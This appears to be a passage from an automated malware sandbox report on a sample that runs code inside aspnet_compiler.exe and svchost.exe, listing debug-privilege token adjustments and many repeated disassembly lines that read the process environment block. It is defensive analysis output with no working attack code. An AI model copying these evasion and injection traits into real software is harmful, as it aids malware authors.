Source: C:\Users\user\Desktop\fooYgfbxno.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B944 mov eax, dword ptr fs:[00000030h] 2_2_0153B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B944 mov eax, dword ptr fs:[00000030h] 2_2_0153B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151B171 mov eax, dword ptr fs:[00000030h] 2_2_0151B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151B171 mov eax, dword ptr fs:[00000030h] 2_2_0151B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151C962 mov eax, dword ptr fs:[00000030h] 2_2_0151C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519100 mov eax, dword ptr fs:[00000030h] 2_2_01519100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519100 mov eax, dword ptr fs:[00000030h] 2_2_01519100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519100 mov eax, dword ptr fs:[00000030h] 2_2_01519100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154513A mov eax, dword ptr fs:[00000030h] 2_2_0154513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154513A mov eax, dword ptr fs:[00000030h] 2_2_0154513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01534120 mov eax, dword ptr fs:[00000030h] 2_2_01534120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01534120 mov eax, dword ptr fs:[00000030h] 2_2_01534120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01534120 mov eax, dword ptr fs:[00000030h] 2_2_01534120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01534120 mov eax, dword ptr fs:[00000030h] 2_2_01534120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01534120 mov ecx, dword ptr fs:[00000030h] 2_2_01534120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0151B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0151B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0151B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015A41E8 mov eax, dword ptr fs:[00000030h] 2_2_015A41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542990 mov eax, dword ptr fs:[00000030h] 2_2_01542990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154A185 mov eax, dword ptr fs:[00000030h] 2_2_0154A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153C182 mov eax, dword ptr fs:[00000030h] 2_2_0153C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015951BE mov eax, dword ptr fs:[00000030h] 2_2_015951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015951BE mov eax, dword ptr fs:[00000030h] 2_2_015951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015951BE mov eax, dword ptr fs:[00000030h] 2_2_015951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015951BE mov eax, dword ptr fs:[00000030h] 2_2_015951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov eax, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov eax, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov eax, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov eax, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015461A0 mov eax, dword ptr fs:[00000030h] 2_2_015461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015461A0 mov eax, dword ptr fs:[00000030h] 2_2_015461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h] 2_2_015D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h] 2_2_015D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h] 2_2_015D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h] 2_2_015D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015969A6 mov eax, dword ptr fs:[00000030h] 2_2_015969A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01530050 mov eax, dword ptr fs:[00000030h] 2_2_01530050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01530050 mov eax, dword ptr fs:[00000030h] 2_2_01530050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E1074 mov eax, dword ptr fs:[00000030h] 2_2_015E1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2073 mov eax, dword ptr fs:[00000030h] 2_2_015D2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E4015 mov eax, dword ptr fs:[00000030h] 2_2_015E4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E4015 mov eax, dword ptr fs:[00000030h] 2_2_015E4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01597016 mov eax, dword ptr fs:[00000030h] 2_2_01597016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01597016 mov eax, dword ptr fs:[00000030h] 2_2_01597016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01597016 mov eax, dword ptr fs:[00000030h] 2_2_01597016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h] 2_2_0153A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h] 2_2_0153A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h] 2_2_0153A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h] 2_2_0153A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h] 2_2_0152B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h] 2_2_0152B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h] 2_2_0152B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h] 2_2_0152B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154002D mov eax, dword ptr fs:[00000030h] 2_2_0154002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154002D mov eax, dword ptr fs:[00000030h] 2_2_0154002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154002D mov eax, dword ptr fs:[00000030h] 2_2_0154002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154002D mov eax, dword ptr fs:[00000030h] 2_2_0154002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154002D mov eax, dword ptr fs:[00000030h] 2_2_0154002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h] 2_2_015AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AB8D0 mov ecx, dword ptr fs:[00000030h] 2_2_015AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h] 2_2_015AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h] 2_2_015AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h] 2_2_015AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h] 2_2_015AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015140E1 mov eax, dword ptr fs:[00000030h] 2_2_015140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015140E1 mov eax, dword ptr fs:[00000030h] 2_2_015140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015140E1 mov eax, dword ptr fs:[00000030h] 2_2_015140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0153B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0153B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015158EC mov eax, dword ptr fs:[00000030h] 2_2_015158EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519080 mov eax, dword ptr fs:[00000030h] 2_2_01519080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01593884 mov eax, dword ptr fs:[00000030h] 2_2_01593884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01593884 mov eax, dword ptr fs:[00000030h] 2_2_01593884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0154F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154F0BF mov eax, dword ptr fs:[00000030h] 2_2_0154F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154F0BF mov eax, dword ptr fs:[00000030h] 2_2_0154F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h] 2_2_015420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h] 2_2_015420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h] 2_2_015420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h] 2_2_015420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h] 2_2_015420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h] 2_2_015420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015590AF mov eax, dword ptr fs:[00000030h] 2_2_015590AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E8B58 mov eax, dword ptr fs:[00000030h] 2_2_015E8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151F358 mov eax, dword ptr fs:[00000030h] 2_2_0151F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151DB40 mov eax, dword ptr fs:[00000030h] 2_2_0151DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01543B7A mov eax, dword ptr fs:[00000030h] 2_2_01543B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01543B7A mov eax, dword ptr fs:[00000030h] 2_2_01543B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0151DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D131B mov eax, dword ptr fs:[00000030h] 2_2_015D131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015953CA mov eax, dword ptr fs:[00000030h] 2_2_015953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015953CA mov eax, dword ptr fs:[00000030h] 2_2_015953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0153DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C23E3 mov ecx, dword ptr fs:[00000030h] 2_2_015C23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C23E3 mov ecx, dword ptr fs:[00000030h] 2_2_015C23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C23E3 mov eax, dword ptr fs:[00000030h] 2_2_015C23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542397 mov eax, dword ptr fs:[00000030h] 2_2_01542397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154B390 mov eax, dword ptr fs:[00000030h] 2_2_0154B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153EB9A mov eax, dword ptr fs:[00000030h] 2_2_0153EB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153EB9A mov eax, dword ptr fs:[00000030h] 2_2_0153EB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D138A mov eax, dword ptr fs:[00000030h] 2_2_015D138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CD380 mov ecx, dword ptr fs:[00000030h] 2_2_015CD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01521B8F mov eax, dword ptr fs:[00000030h] 2_2_01521B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01521B8F mov eax, dword ptr fs:[00000030h] 2_2_01521B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154138B mov eax, dword ptr fs:[00000030h] 2_2_0154138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154138B mov eax, dword ptr fs:[00000030h] 2_2_0154138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154138B mov eax, dword ptr fs:[00000030h] 2_2_0154138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h] 2_2_01544BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h] 2_2_01544BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h] 2_2_01544BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E5BA5 mov eax, dword ptr fs:[00000030h] 2_2_015E5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DEA55 mov eax, dword ptr fs:[00000030h] 2_2_015DEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015A4257 mov eax, dword ptr fs:[00000030h] 2_2_015A4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519240 mov eax, dword ptr fs:[00000030h] 2_2_01519240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519240 mov eax, dword ptr fs:[00000030h] 2_2_01519240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519240 mov eax, dword ptr fs:[00000030h] 2_2_01519240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519240 mov eax, dword ptr fs:[00000030h] 2_2_01519240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155927A mov eax, dword ptr fs:[00000030h] 2_2_0155927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CB260 mov eax, dword ptr fs:[00000030h] 2_2_015CB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CB260 mov eax, dword ptr fs:[00000030h] 2_2_015CB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E8A62 mov eax, dword ptr fs:[00000030h] 2_2_015E8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01515210 mov eax, dword ptr fs:[00000030h] 2_2_01515210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01515210 mov ecx, dword ptr fs:[00000030h] 2_2_01515210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01515210 mov eax, dword ptr fs:[00000030h] 2_2_01515210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01515210 mov eax, dword ptr fs:[00000030h] 2_2_01515210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151AA16 mov eax, dword ptr fs:[00000030h] 2_2_0151AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151AA16 mov eax, dword ptr fs:[00000030h] 2_2_0151AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DAA16 mov eax, dword ptr fs:[00000030h] 2_2_015DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DAA16 mov eax, dword ptr fs:[00000030h] 2_2_015DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01533A1C mov eax, dword ptr fs:[00000030h] 2_2_01533A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01528A0A mov eax, dword ptr fs:[00000030h] 2_2_01528A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01554A2C mov eax, dword ptr fs:[00000030h] 2_2_01554A2C
